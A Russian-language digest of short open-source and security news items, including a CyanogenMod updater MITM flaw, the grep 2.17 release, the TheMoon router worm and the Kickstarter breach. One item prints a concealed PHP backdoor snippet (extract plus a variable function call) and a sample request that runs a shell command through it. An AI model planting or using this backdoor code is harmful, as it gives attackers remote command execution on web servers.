Система обновления Cyanogenmod подвержена совершению MITM-атак

Исследователи безопасности обратили внимание на использование незашифрованного HTTP-соединения при проверке наличия обновлений и загрузке zip-файлов программой для установки обновлений для свободной Android-прошивки Cyanogenmod в сочетании с отсутствием верификации загруженных данных по цифровой подписи или контрольной сумме, отдельно получаемой из надёжных источников (контрольная сумма также передаётся по HTTP). Подобная недоработка позволяет организовать MITM-атаку по подмене загружаемого файла на одном из транзитных узлов, через который проходит трафик пользователя. В настоящее время разработчики Cyanogenmod уже обеспечили возможность ручной загрузки обновлений через HTTPS, но доступ к API при проверке обновлений по-прежнему производится через HTTP. В качестве примера атаки по установке подставного обновления, продемонстрирована возможность … Читать далее Система обновления Cyanogenmod подвержена совершению MITM-атак

В grep 2.17 кардинально увеличена скорость работы с многобайтовыми кодировками

Представлен новый выпуск популярной утилиты для организации поиска данных в текстовых файлах — GNU Grep 2.17. Наиболее существенным улучшением является проведение заметной оптимизации производительности. Кроме того, в выпуске grep 2.17 прекращена поддержка опции «—mmap», которая давно была переведена в категорию устаревших. При использовании многобайтовых локалей поиск без учёта регистра через «grep -i» по простому шаблону, не содержащему символов » и ‘[‘, теперь выполняется в десять раз быстрее. Поиск с учётом регистра (без опции «-i») для многобайтовых локалей в новом выпуске выполняется в семь раз быстрее при наличии в тексте большого числа совпадений. Читать далее В grep 2.17 кардинально увеличена скорость работы с многобайтовыми кодировками

Опубликован код для организации передачи данных между ноутбуками в ультразвуковом диапазоне

В декабре группа немецких исследователей сообщила об успешном создании прототипа системы обмена данными между двумя ноутбуками при помощи звукового канала связи, организованного в неслышимом диапазоне частот. Реализация данной системы так и не была открыта, поэтому несколько энтузиастов добились проведения похожего эксперимента используя свободный пакет GNU Radio для цифровой обработки и генерации сигналов. Подготовленный в ходе работы набор патчей к GNU Radio и сценарий проведения эксперимента опубликованы на GitHub. Представленные наработки позволяют организовать TCP/IP туннель между двумя рядом стоящими ноутбуками, используя для передачи данных штатные микрофоны и громкоговорители ноутбуков. Для организации канала связи используется близкий к ультразвуковому диапазон частот, не слышимый … Читать далее Опубликован код для организации передачи данных между ноутбуками в ультразвуковом диапазоне

Одиннадцатая акция Humble Indie Bundle по распространению комплекта игр

Объявлено о проведении новой акции «Humble Indie Bundle«, в рамках которой пользователь может получить комплект из 6 многоплатформенных игр в обмен на пожертвование проекту любой суммы. Распространяемые в рамках акции могут работать на платформах Mac OS X, Windows и Linux. В пакет входят следующие игры: Guacamelee! Gold Edition, Dust: An Elysian Tail, The Swapper, Giana Sisters: Twisted Dreams, Antichamber и Monaco: What’s Yours is Mine (две последние игры доступны только перечислившим от $3.84). На момент написания новости собрано уже около 100 тыс. долларов. Средний размер суммы взноса составил $3.84. Средний размер взноса пользователей Linux систем составил $5.29, Mac OS X … Читать далее Одиннадцатая акция Humble Indie Bundle по распространению комплекта игр

Необычный способ организации вызова PHP-бэкдора

Выявлен заслуживающий внимания PHP-бэкдор, активация которого производится без видимого обращения к таким функциям, как «eval», «exec», «system», «assert» и «preg_replace». Вместо явного указания eval и других сразу вызывающих подозрение функций, при установке бэкдора в файле phpinfo.php появляется несколько на первый взгляд неопасных строк: @extract ($_REQUEST); @die ($ctime($atime)); При более вдумчивом просмотре становится ясно, что при помощи функции extract осуществляется создание переменных на основании данных, переданных в составе запроса GET или POST. Конструкция $ctime($atime) по сути является вызовом функции, имя которой хранится в переменной $ctime. Сформировав запрос «/phpinfo.php?ctime=systematime=ls -la» получим вызов функции system() с аргументом «ls -la». Читать далее Необычный способ организации вызова PHP-бэкдора

Google ограничил в Android доступ сторонних приложений к внешней SD-карте

Разработчики файловых менеджеров столкнулись с появлением в Android 4.4 (KitKat) новых ограничений на доступ приложений, имеющих полномочия WRITE_EXTERNAL_STORAGE, к внешним накопителям. Отныне возможность полного доступа ограничена только первичным накопителем и не применима ко вторичным. Изменение касается только устройств с двойным хранилищем, в которых в роли первичного накопителя выступает встроенная Flash-память, а вторичного — SD-карта. С практической стороны, подобное ограничение не позволяет реализовать полный контроль над SD-картой, например, при использовании непривилегированного файлового менеджера невозможно удалить или записать произвольные данные на SD-карту. Системные приложения могут организовать запись на вторичные накопители при наличии полномочий WRITE_MEDIA_STORAGE, которые не выдаются для пользовательских программ, устанавливаемых из … Читать далее Google ограничил в Android доступ сторонних приложений к внешней SD-карте

Использование VLC может привести к потере гарантии на громкоговорители ноутбуков Dell

По заявлению компании Dell, пользователь может лишиться гарантии на встроенные громкоговорители ноутбуков, если в системе установлен медиапроигрыватель VLC. Причиной подобного шага является наличие в VLC штатной возможности установки громкости, превышающего номинальный уровень. По мнению Dell, установка в VLC завышенного уровня звука может привести к выходу громкоговорителей из строя. Разработчики VLC исключают такую возможность и считают отказ гарантийного восстановления повреждённого громкоговорителя формальным поводом, так как для вывода звука в VLC используется штатный API, не позволяющий превысить номинальный уровень громкости, а усиление производится лишь на уровне декодирования, т.е. виртуально повышается громкость контента, закодированного с пониженным уровнем громкости. В качестве реальной причины называется … Читать далее Использование VLC может привести к потере гарантии на громкоговорители ноутбуков Dell

Представлена программа по привлечению сообщества к созданию вирусных сигнатур для ClamAV

Разработчики свободного антивирусного пакета ClamAV представили новую упрощённую программу приёма вирусных сигнатур от представителей сообщества. Для приёма сигнатур создан отдельный список рассылки community-sigs, в который достаточно отправить подготовленную сигнатуру, краткое описание и MD5/SHA1/SHA256 хэш примера вредоносного кода для которого подготовлена сигнатура. Непосредственно вредоносное ПО, определяемое сигнатурой, следует отправить отдельно, через специальную форму на сайте. После проверки и возможной доработки для соответствия требованиям проекта сигнатура будет добавлена в антивирусную базу. Читать далее Представлена программа по привлечению сообщества к созданию вирусных сигнатур для ClamAV

Система обновления Cyanogemod подвержена совершению MITM-атак

Исследователи безопасности обратили внимание на использование незашифрованного HTTP-соединения при проверке наличия обновлений и загрузке zip-файлов программой для установки обновлений для свободной Android-прошивки Cyanogemod в сочетании с отсутствием верификации загруженных данных по цифровой подписи или контрольной сумме, отдельно получаемой из надёжных источников (контрольная сумма также передаётся по HTTP). Подобная недоработка позволяет организовать MITM-атаку по подмене загружаемого файла на одном из транзитных узлов, через который проходит трафик пользователя. В настоящее время разработчики Cyanogemod уже обеспечили возможность ручной загрузки обновлений через HTTPS, но доступ к API при проверке обновлений по-прежнему производится через HTTP. В качестве примера атаки по установке подставного обновления, продемонстрирована возможность … Читать далее Система обновления Cyanogemod подвержена совершению MITM-атак

Ubuntu CyberPack (ALF) 1.0

Проект UALinux представил Ubuntu CyberPack (ALF) 1.0 (Analysis, Logging, Forensics), специализированную Live-сборку Ubuntu Linux с подборкой приложений для выявления скрытых данных, получения и фиксации цифровых доказательств и проведения криминалистического анализа. Дистрибутив позволяет выполнять такие действия, как выявление скрытых и удаленных данных, сбор доказательств по использованию ПК для совершения правонарушений, протоколирование произведенных при осмотре действий. Размер iso-образа 819 Мб. Дистрибутив основан на пакетной базе Ubuntu 12.04.4 и поставляется с пользовательской оболочкой на основе LXDE. Поддерживается работа с различными файловыми системами (ext2/3/4, NTFS, FAT/32, VFAT, exFAT, XFS, BtrFS, UFS, ReiserFS/4, HFS/+, ZFS и д.п), разделами RAID и LVM. По умолчанию все обнаруженные … Читать далее Ubuntu CyberPack (ALF) 1.0

В Steam VAC выявлен факт отправки хэшированного содержимого кэша DNS на внешний сервер

В процессе декомпиляции развиваемой компанией Valve античитерской системы Steam VAC (Valve Anti-Cheat) выявлен факт грубого нарушения приватности, выражающийся в отправке на внешний сервер md5-хешей доменов, к которым обращался пользователь (отправляется содержимое кэша DNS). Проблема выявлена в Windows-версиях системы (содержимое кэша DNS в Windows можно посмотреть командой «ipconfig /displaydns»). В Linux доступ к кэшу DNS зависит от типа применяемого на локальной системе кэширующего сервера (dnsmasq, nscd, bind) и возможен только для суперпользователя после включения специальных отладочных режимов. Читать далее В Steam VAC выявлен факт отправки хэшированного содержимого кэша DNS на внешний сервер

Выявлен червь, поражающий неисправленную уязвимость в маршрутизаторах Linksys

Центр противодействия угрозам в Интернет опубликовал предупреждение о выявлении активности сетевого червя TheMoon, поражающего беспроводные маршрутизаторы Linksys (модели Wireless-N и серии E). Используя для проникновения неисправленную уязвимость червь получает управление на устройстве, загружает исполняемый файл ELF для архитектуры MIPS и запускает процесс сканирования сети на предмет выявления других уязвимых устройств и повторения атаки. Сканирование ограничено 670 сетями (/21 и /24) DSL-провайдеров в разных странах. В случае выявления уязвимого устройства, запускается эксплоит и на осуществляющей сканирование системе кратковременно открывается случайный сетевой порт для отдачи копии бинарного файла с червём. После того как файл загружен, порт закрывается. В файле с червём также … Читать далее Выявлен червь, поражающий неисправленную уязвимость в маршрутизаторах Linksys

Clang 3.4 интегрирован в кодовую базу FreeBSD

Объявлено о переводе актуальной кодовой базы FreeBSD-CURRENT на Clang 3.4 и новые версии сопутствующих библиотек и компонентов LLVM 3.4. Выпуск Clang 3.4 примечателен реализацией всех возможностей чернового варианта будущего стандарта C++1y и существенным увеличением производительности генераторов кода. Сообщается, что добавленные в LLVM 3.4 улучшения позволяют начать интеграцию Clang для дополнительных архитектур FreeBSD, таких как powerpc, mips и arm64. Пользователям и мэйнтейнерам портов рекомендует обратить внимание на более жесткий контроль опций: некоторые ранее игнорируемые флаги, которые не удалось распознать (например, специфичные для GCC опции для тонкой настройки режимов оптимизации), теперь могут привести к выводу ошибки. Читать далее Clang 3.4 интегрирован в кодовую базу FreeBSD

Релиз распределенной системы управления исходными текстами Git 1.9.0

Доступен релиз распределенной системы управления исходными текстами Git 1.9.0. Скачок в нумерации версии связан с внесением изменений, нарушающих обратную совместимость. Более существенные нарушения совместимости, связанные с изменением поведения команд «git puth» и «git add», отложены до выпуска Git 2.0. Git является одной из самых эффективных, надёжных и высокопроизводительных систем управления версиями, предоставляющей гибкие средства нелинейной разработки, базирующиеся на ответвлении и слиянии веток. Для обеспечения целостности истории и устойчивости к изменениям задним числом используются криптографические методы, также возможна привязка цифровых подписей разработчиков к тегам и коммитам. Из проектов, разрабатываемых с использованием Git, можно отметить ядро Linux, Android, Libreoffice, Systemd, X.Org, Wayland, … Читать далее Релиз распределенной системы управления исходными текстами Git 1.9.0

Прогресс в разработке нового главного меню ReactOS

Разработчики свободной операционной системы ReactOS, нацеленной на обеспечение совместимости с программами и драйверами Microsoft Windows семейства NT (XP/2003/Vista), рассказали об успехах в разработке нового главного меню, работающего в стиле меню Windows 7. Новая реализация меню базируется на классе CMenuSite, обеспечивающем прослойку для обмена событиями и сообщениями между базовым меню и вторичными раскрывающимися блоками. Читать далее Прогресс в разработке нового главного меню ReactOS

Carbon Billing 5 перешёл на Python и контейнеры (реклама)

Увидела свет биллинг-система Carbon Billing 5.1, которая ознаменовала доведение новой ветки до готовности для поставки в форме коробочного продукта. Carbon Billing 5 представляет собой модульный биллинг, поставляющийся в виде дистрибутива Linux с предварительно настроенными контейнерами приложений. После установки ISO-образа, поставляемого для ахитектуры x86_64, в течение 90 дней система работает в полнофункциональном demo-режиме. Carbon Billing 5 является коммерческим продуктом, но для конфигураций, обслуживающих до 200 пользователей, можно получить бесплатную лицензию на всю жизнь. Системное окружение основано на пакетной базе Linux-дистрибутива CentOS 6.4. В состав входит серия приложений для провайдеров, каждое из которых находится в chroot-окружении. В дальнейшем, для запуска окружений планируется … Читать далее Carbon Billing 5 перешёл на Python и контейнеры (реклама)

Портирование десктоп-окружения MATE для Wayland. Переход на GTK3+ отложен до MATE 1.10

Один из разработчиков десктоп-окружения MATE, в рамках которого продолжено развитие кодовой базы GNOME 2.32 с сохранением классической концепции формирования рабочего стола, рассказал о состоянии работы по портированию окружения для работы поверх графической системы на базе Wayland и Weston. Разработка пока находится на начальной стадии. Поддержку Wayland планируется интегрировать в выпуск MATE 1.10. До сих пор приступить к портированию мешала привязка панели MATE к интерфейсам GtkSocket/GtkPlug, используемым для организации совместного доступа к областям вывода из разных процессов GTK. Такая возможность не поддерживается протоколом Wayland, поэтому первым делом поддержка данной функциональности была реализована в форме дополнения к композитному серверу Weston. На следующей … Читать далее Портирование десктоп-окружения MATE для Wayland. Переход на GTK3+ отложен до MATE 1.10

Взлом Kickstarter привёл к утечке данных пользователей

Объявлено о взломе Kickstarter, крупнейшей платформы для коллективного сбора средств. В результате атаки злоумышленники смогли получить доступ к некоторым данным пользователей сервиса. В частности, среди попавших в чужие руки данных отмечаются хэши паролей, адреса электронной почты, почтовые адреса и номера телефонов. Утечки параметров кредитных карт не произошло. Для хэширования паролей старых аккаунтов использовался SHA-1, для новых — bcrypt. В связи с инцидентом, всем пользователям сервиса рекомендуется срочно поменять пароль доступа. В случае использования одного пароля на нескольких сайтах желательно поменять аналогичный пароль и на других ресурсах. Подробности о методах, при помощи которых было совершено проникновение, не сообщаются, но указано, что … Читать далее Взлом Kickstarter привёл к утечке данных пользователей

Китайцы загрузили 1.7 млн копий Ubuntu Kylin

Компания Canonical опубликовала статистику по числу загрузок Ubuntu Kylin, официальной редакции Ubuntu для китайских пользователей, которая отличается встроенной поддержкой китайского языка и китайского календаря, поставкой по умолчанию офисного пакета Kingsoft, а также ориентацией на предпочтения китайских пользователей, в том числе интеграцией с китайскими online-сервисами. Для выпуска Ubuntu Kylin 13.10 зафиксировано более 1.3 млн загрузок. В то время как версия Ubuntu Kylin 13.04 была загружено 400 тысяч раз, что явно демонстрирует рост интереса китайских пользователей к Ubuntu. Также сообщается, что примерно в 2500 магазинах по всему Китаю продаются ноутбуки и ПК HP, Dell и Lenovo с предустановленным Ubuntu Kylin. Читать далее Китайцы загрузили 1.7 млн копий Ubuntu Kylin

Выпуск Brython 2.0, реализации языка Python для web-страниц

Представлен релиз проекта Brython 2.0 (Browser Python), в рамках которого развивается реализация языка программирования Python 3, предназначенная для выполнения на стороне web-браузера. Brython может использоваться вместо JavaScript для разработки скриптов для Web. Размер библиотеки brython.js около 300 Кб. Подключив библиотеку brython.js, web-разработчик может использовать язык Python для определения логики работы сайта на стороне клиента, используя Python вместо JavaScript. Для включения Python-кода на страницы используется тег script с mime-типом «text/python». Из скрипта предоставляется полный доступ к элементам и событиям DOM. Метод работы Brython сводится к предварительной компиляции Python кода в представление на языке JavaScript с последующим его выполнением штатным JavaScript-движком браузера. … Читать далее Выпуск Brython 2.0, реализации языка Python для web-страниц

Проект Wine возобновил публикацию бюллетеня WWN

Спустя почти четыре года с момента прошлого выпуска возобновлена подготовка бюллетеня WWN (World Wine News), рассказывающего об основных событиях, связанных с разработкой проекта Wine. Выпуск в основном интересен обзором изменения статуса поддержки в Wine популярных игр и приложений Windows. За две последние недели открыто 7601 отчётов об ошибках (4053 не подтверждены), закрыто — 27811, решено проблем — 164. Читать далее Проект Wine возобновил публикацию бюллетеня WWN